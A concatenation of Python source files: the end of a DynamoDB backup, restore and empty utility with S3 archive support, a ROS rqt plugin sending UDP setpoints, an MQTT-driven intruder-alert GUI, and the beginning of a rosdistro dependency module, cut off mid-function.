contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except botocore.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
    Wait for table to be in desired state
"""
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(table_name,
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
scanned_table = dynamo.scan(table_name,
exclusive_start_key=last_evaluated_key)
except ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
while True:
try:
dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
else:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(destination_table,
global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if (e.body["__type"] ==
"com.amazonaws.dynamodb.v20120810#LimitExceededException"):
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif (e.body["__type"] ==
"com.amazon.coral.availability#ThrottlingException"):
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
host=args.host,
port=int(args.port),
is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
            # Use Boto3 to find tags. Boto3 provides a paginator that makes searching tables easier.
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
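            # Back up tables concurrently: worker threads pull table names from a queue,
            # and one None sentinel per worker signals shutdown once the queue is drained.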
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
my_module.py
|
import os
import rospy
import rospkg
from python_qt_binding import QT_BINDING
import sys
from python_qt_binding.QtCore import qDebug
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding.QtWidgets import QWidget, QSlider
from python_qt_binding.QtCore import QObject
# import socket programming library
import socket, select
import matplotlib
# import thread module
from _thread import *
import threading
from struct import *
class MyPlugin(Plugin):
target_pos = []
target_force = []
s = []
s_cmd = []
port = 8002 # where do you expect to get a msg?
bufferSize = 12 # whatever you need
server_thread = []
client_address = ('192.168.0.102', 8000)
def __init__(self, context):
super(MyPlugin, self).__init__(context)
# Give QObjects reasonable names
self.setObjectName('MyPlugin')
# Process standalone plugin command-line arguments
from argparse import ArgumentParser
parser = ArgumentParser()
# Add argument(s) to the parser.
parser.add_argument("-q", "--quiet", action="store_true",
dest="quiet",
help="Put plugin in silent mode")
args, unknowns = parser.parse_known_args(context.argv())
if not args.quiet:
            print('arguments: ', args)
            print('unknowns: ', unknowns)
# Create QWidget
self._widget = QWidget()
# Get path to UI file which should be in the "resource" folder of this package
ui_file = os.path.join(rospkg.RosPack().get_path('m3_rqt'), 'resource', 'MyPlugin.ui')
# Extend the widget with all attributes and children from UI file
loadUi(ui_file, self._widget)
# Give QObjects reasonable names
self._widget.setObjectName('M3')
# Show _widget.windowTitle on left-top of each plugin (when
# it's set in _widget). This is useful when you open multiple
# plugins at once. Also if you open multiple instances of your
# plugin at once, these lines add number to make it easy to
# tell from pane to pane.
if context.serial_number() > 1:
self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# Add widget to the user interface
context.add_widget(self._widget)
self.target_pos = self._widget.findChild(QSlider, "target_pos")
self.target_force = self._widget.findChild(QSlider, "target_force")
self.target_pos.valueChanged.connect(self.pos_target_change)
self.target_force.valueChanged.connect(self.force_target_change)
import select, socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('255.255.255.255', self.port))
self.s.setblocking(0)
self.server_thread = threading.Thread(target=self.receiveStatus)
self.server_thread.daemon = True
self.server_thread.start()
self.s_cmd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # thread function
def receiveStatus(self):
while not rospy.is_shutdown():
result = select.select([self.s],[],[])
msg = result[0][0].recv(self.bufferSize)
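            # 12-byte datagram (bufferSize) decoded as three native-endian floats ('fff')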
print(unpack('fff',msg))
def shutdown_plugin(self):
# TODO unregister all publishers here
pass
def save_settings(self, plugin_settings, instance_settings):
# TODO save intrinsic configuration, usually using:
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO restore intrinsic configuration, usually using:
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# Comment in to signal that the plugin has a way to configure
# This will enable a setting button (gear icon) in each dock widget title bar
# Usually used to open a modal configuration dialog
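    # Command datagrams appear to be pack('fB', setpoint, mode): a float setpoint followed by
    # a one-byte mode flag (0 = position target, 1 = force target). This is inferred from the
    # two slider callbacks below rather than from any protocol documentation.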
def pos_target_change(self):
setpoint = self.target_pos.value()
print(setpoint)
self.s_cmd.sendto(pack('fB', setpoint,0),self.client_address)
def force_target_change(self):
setpoint = self.target_force.value()
print(setpoint)
self.s_cmd.sendto(pack('fB', setpoint,1),self.client_address)
|
sub_thread.py
|
import paho.mqtt.subscribe as sub
from guizero import *
import threading
app=App(title="harini")
label1 = Text(app, text="Intruder Detection")
textb = TextBox(app)
textb.resize(200,20)
textb.disable()
intruder = Picture(app, image="intr.jpg")
intruder.resize(350,400)
def recv():
while(True):
msg = sub.simple("pir_channel", hostname="localhost")
#textb.clear()
inMess = msg.payload.decode()
textb.set(inMess)
print(inMess)
t1 = threading.Thread(target=recv)
t1.start()
app.display()
|
rosdistro.py
|
import copy
import os
import sys
import tarfile
import tempfile
import threading
try:
from urllib.request import urlopen
from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen
from urllib2 import HTTPError
import yaml
from .common import error
from .common import info
from .common import warning
RES_DICT = {'build': [], 'buildtool': [], 'test': [], 'run': []}
RES_TREE = {'build': {}, 'buildtool': {}, 'test': {}, 'run': {}}
CACHE_VERSION = 1
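# Dependency-walk strategies: FULL_WALK expands every dependency type at each level, while
# SPIRAL_OF_DOOM follows a single cyclic chain build -> run -> buildtool -> test -> build.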
walks = {
'FULL_WALK': {'build': ['build', 'run', 'buildtool', 'test'],
'run': ['build', 'run', 'buildtool', 'test'],
'buildtool': ['build', 'run', 'buildtool', 'test'],
'test': ['build', 'run', 'buildtool', 'test']},
'SPIRAL_OF_DOOM': {'build': ['run'],
'run': ['buildtool'],
'buildtool': ['test'],
'test': ['build']}
}
def invert_dict(d):
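    # e.g. {'a': ['x', 'y'], 'b': ['x']} -> {'x': ['a', 'b'], 'y': ['a']}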
inverted = {}
for key, value in d.iteritems():
for v in value:
v_keys = inverted.setdefault(v, [])
if key not in v_keys:
v_keys.append(key)
return inverted
class RosDistro:
def __init__(self, name, cache_location=None):
self.depends_on1_cache = copy.deepcopy(RES_TREE)
t1 = threading.Thread(target=self._construct_rosdistro_file, args=(name,))
t2 = threading.Thread(target=self._construct_rosdistro_dependencies, args=(name, cache_location,))
t1.start()
t2.start()
t1.join()
t2.join()
def _construct_rosdistro_file(self, name):
self.distro_file = RosDistroFile(name)
def _construct_rosdistro_dependencies(self, name, cache_location):
self.depends_file = RosDependencies(name, cache_location)
def get_repositories(self):
return self.distro_file.repositories
def get_repository(self, repo):
return self.get_repositories()[repo]
def get_packages(self):
return self.distro_file.packages
def get_package(self, pkg):
